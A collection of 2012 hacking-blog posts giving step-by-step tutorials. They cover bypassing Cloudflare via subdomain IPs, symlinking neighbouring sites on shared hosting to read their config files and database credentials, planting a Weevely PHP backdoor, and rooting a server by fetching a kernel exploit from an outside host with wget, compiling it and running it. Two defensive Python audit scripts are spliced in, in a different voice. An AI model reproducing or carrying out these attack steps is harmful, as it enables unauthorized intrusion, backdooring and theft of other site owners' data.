Showing posts with label Linux Exploitation. Show all posts

Tuesday, 25 September 2012

How To Get All Subdomains Of A Website and Bypass Cloudflare Protection

Hello guys :)
Today I have a new video tutorial for you :)
I will show you how to get all the subdomains of a target, along with their IPs, which can sometimes let us bypass Cloudflare protection :)
Hope you enjoy this video :)



Best Played In Full Screen Mode!
Btw, I mean "server names", not "hostnames", in the USA.gov test :P


Tuesday, 14 August 2012

Symlink Tutorial





Hello Guys, today I'm going to explain how to symlink websites using two different methods.
So let's start!

[#] Explanation
First I will explain what symlinking can do. Symlinking is making symbolic links to other websites on the same server to read their configuration files, connect to their database, and get the information needed to access their control panel.
And that's about it :)



[#] Method #1

After uploading your shell to the server, make a directory with the command below:

mkdir sym


NOTE:- The directory can be called whatever you want; just change "sym" to any name.

Enter your new directory, then upload OR create a file called ".htaccess" in the new directory with the code below inside it:


Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Like this picture:

After that, we will run the command below to create a symlink to the "/" directory:
ln -s / root
It will look like this:


And if we open the directory "sym" from our browser, like "www.website.com/sym",
it should look like this:
In the image above my shell was in /downloads, so I made the "sym" directory inside /downloads.

Our process is almost done; now we just have to get the user of the target website.
I've provided the user.php code at the bottom of the post; this script will give you all the websites on the server and their usernames.

When you get the username of your target, just open a link like this:

www.website.com/sym/root/home/(user)/public_html
where (user) = the user of the target.
Here is an example picture:

where the user was "hillock"

Now the next step is easy: we will start looking for the configuration file; it's usually called config.php or configuration.php.
Here are the locations of the configuration files in the most famous web apps out there.


vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


When you find the configuration file, it will contain the database details.
It will look like the image below (the image below is a Joomla configuration file):

Now upload SQL.php (code provided below)
and connect to the database.
Congrats :) now you can get all the details from the admin table, and even change them.

[#] Method #2

In this method, we won't symlink the root directory; we will symlink the target's public_html directory directly.
To do this, just follow these steps:
1. Make a new directory, just like in method 1.
2. Make ".htaccess" OR upload it with the code below:

Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php

3. Run the following command:

ln -s /home/(user)/public_html (user)

where (user) = the target's user.
It will look like this when we open it in our browser:
In the picture the username of my target was "csseipsn".
Now you just have to find the configuration and connect :)
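As an added example (not code from the post or its scripts), here is a check a hosting administrator could run over a customer's document root to spot both methods above: symlinks that resolve outside the docroot, such as the `ln -s / root` link, and .htaccess lines carrying `Options all`/`FollowSymLinks` or the `AddType`/`AddHandler` directives that make Apache serve PHP source as plain text. The sample tree is constructed in a temporary directory; `RISKY_DIRECTIVES` and the function names are my own.

```python
import os
import re
import tempfile

# Directives the two methods depend on: "Options all"/FollowSymLinks, plus
# handlers that make Apache serve .php/.html sources as plain text.
RISKY_DIRECTIVES = [
    re.compile(r"^\s*Options\b.*\b(all|FollowSymLinks)\b", re.I),
    re.compile(r"^\s*Add(Type|Handler)\s+(text/plain|txt)\s+\.(php|html)", re.I),
    re.compile(r"^\s*AddHandler\s+server-parsed\s+\.php", re.I),
]

def escaping_symlinks(docroot):
    """Return (link, target) pairs for symlinks resolving outside docroot."""
    root = os.path.realpath(docroot)
    found = []
    for dirpath, dirnames, filenames in os.walk(docroot):  # links are not followed
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.path.realpath(path)
                if os.path.commonpath([root, target]) != root:
                    found.append((path, target))
    return found

def risky_htaccess(docroot):
    """Return (file, line) pairs for .htaccess lines matching RISKY_DIRECTIVES."""
    hits = []
    for dirpath, _, filenames in os.walk(docroot):
        if ".htaccess" in filenames:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, errors="replace") as fh:
                for line in fh:
                    if any(p.search(line) for p in RISKY_DIRECTIVES):
                        hits.append((path, line.strip()))
    return hits

def build_sample_tree():
    """Constructed sample docroot containing the post's 'sym' directory."""
    docroot = tempfile.mkdtemp()
    sym = os.path.join(docroot, "sym")
    os.mkdir(sym)
    with open(os.path.join(sym, ".htaccess"), "w") as fh:
        fh.write("Options Indexes FollowSymlinks\nAddType txt .php\nAddHandler txt .php\n")
    os.symlink("/", os.path.join(sym, "root"))                  # the post's ln -s / root
    os.symlink("index.php", os.path.join(docroot, "home.php"))  # benign in-tree link
    return docroot
```

The server-side fix is to set `AllowOverride None` for customer directories and use `Options -FollowSymLinks +SymLinksIfOwnerMatch` in the vhost, so a per-directory .htaccess cannot re-enable these.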

Scripts Needed:

User.php Source Code
SQL.php Source Code

FOR EDUCATIONAL PURPOSE ONLY!


Monday, 13 August 2012

How To Connect To A Server Via Weevely Backdoor






Hello Guys,
today I have another video for you on how to connect to a server via Weevely!

Weevely is a PHP backdoor,
and from this tutorial you can get a better understanding of my R00ting with Weevely tutorial :)

So here is the video, hope you like it!




Best Played In Full Screen Mode!

Enjoy :)



Friday, 10 August 2012

Rooting A Server With Weevely





Hello again guys,

today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all, open Weevely:
Menu > BackTrack > Maintaining Access > Web Backdoors > Weevely
Or
open a terminal and type:
root@root: cd /pentest/backdoor/web/weevely

############################################################



Now let's make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
By typing this command, we made a backdoor called 'backdoor.php' with the password 'password'.

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g  = Generate backdoor
-o  = Output
-p  = Password
-u  = URL
-t  = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:


Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Let's start:


Open your shell and upload the backdoor:

The link to the backdoor will be the same as the shell's. For example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[hacker@target.com/]
Now, to find the kernel version, type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)

Now we have to find the local root exploit for that kernel on:
www.1337day.com
www.exploit-db.com
www.google.com
and some others..

Now we go to the directory /tmp/, because it's always writable.
Let's say the kernel was 2.6.18.
There are some ways to get the localroot onto the server:
uploading through the shell
the wget method
curl
Now let me explain how each method works:

Of course you know how to upload through the shell :P

wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name

For this tutorial we will use wget.


############################################


[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'

     0K .........                                               208M=0s

2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
OK, now the exploit is on the server; we have to compile it with this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie


[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 zombie

++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie

++++++++++++++++
executing..
++++++++++++++++

[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)

R00ted!
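As an added example (not from the post), a small audit script for the /tmp step above: it reports which hardening mount options (`noexec`, `nosuid`, `nodev`) are missing from a /tmp entry, parsed from a constructed /proc/mounts sample, and lists executable ELF files in a directory, the artifact a compiled binary like `zombie` leaves behind. Function names and the sample data are my own.

```python
import os
import stat
import tempfile

# Constructed sample of /proc/mounts; a real check would read /proc/mounts itself.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
"""

HARDENING_OPTS = {"noexec", "nosuid", "nodev"}

def missing_tmp_options(mounts_text, mountpoint="/tmp"):
    """Hardening options absent from the mountpoint's entry (all, if not a separate mount)."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            return sorted(HARDENING_OPTS - set(fields[3].split(",")))
    return sorted(HARDENING_OPTS)

def elf_executables(directory):
    """Regular files under directory that have an exec bit and the ELF magic."""
    found = []
    for dirpath, _, filenames in os.walk(directory):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & 0o111:
                continue
            with open(path, "rb") as fh:
                if fh.read(4) == b"\x7fELF":
                    found.append(path)
    return sorted(found)

def build_sample_tmp():
    """Constructed sample: a compiled binary, its source, and a shell script."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "2.6.18.c"), "w") as fh:
        fh.write("int main(void) { return 0; }\n")  # source alone is not executable
    with open(os.path.join(d, "zombie"), "wb") as fh:
        fh.write(b"\x7fELF" + b"\x00" * 60)         # fake ELF header, not a real binary
    os.chmod(os.path.join(d, "zombie"), 0o777)      # chmod 777 as in the post
    with open(os.path.join(d, "note.sh"), "w") as fh:
        fh.write("#!/bin/sh\necho hi\n")            # executable but not ELF
    os.chmod(os.path.join(d, "note.sh"), 0o755)
    return d
```

Mounting /tmp with `noexec,nosuid,nodev` does not stop a determined attacker (the file can be run via an interpreter or loader elsewhere), but it removes the "always writable and executable" convenience the post relies on.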

FOR EDUCATIONAL PURPOSE ONLY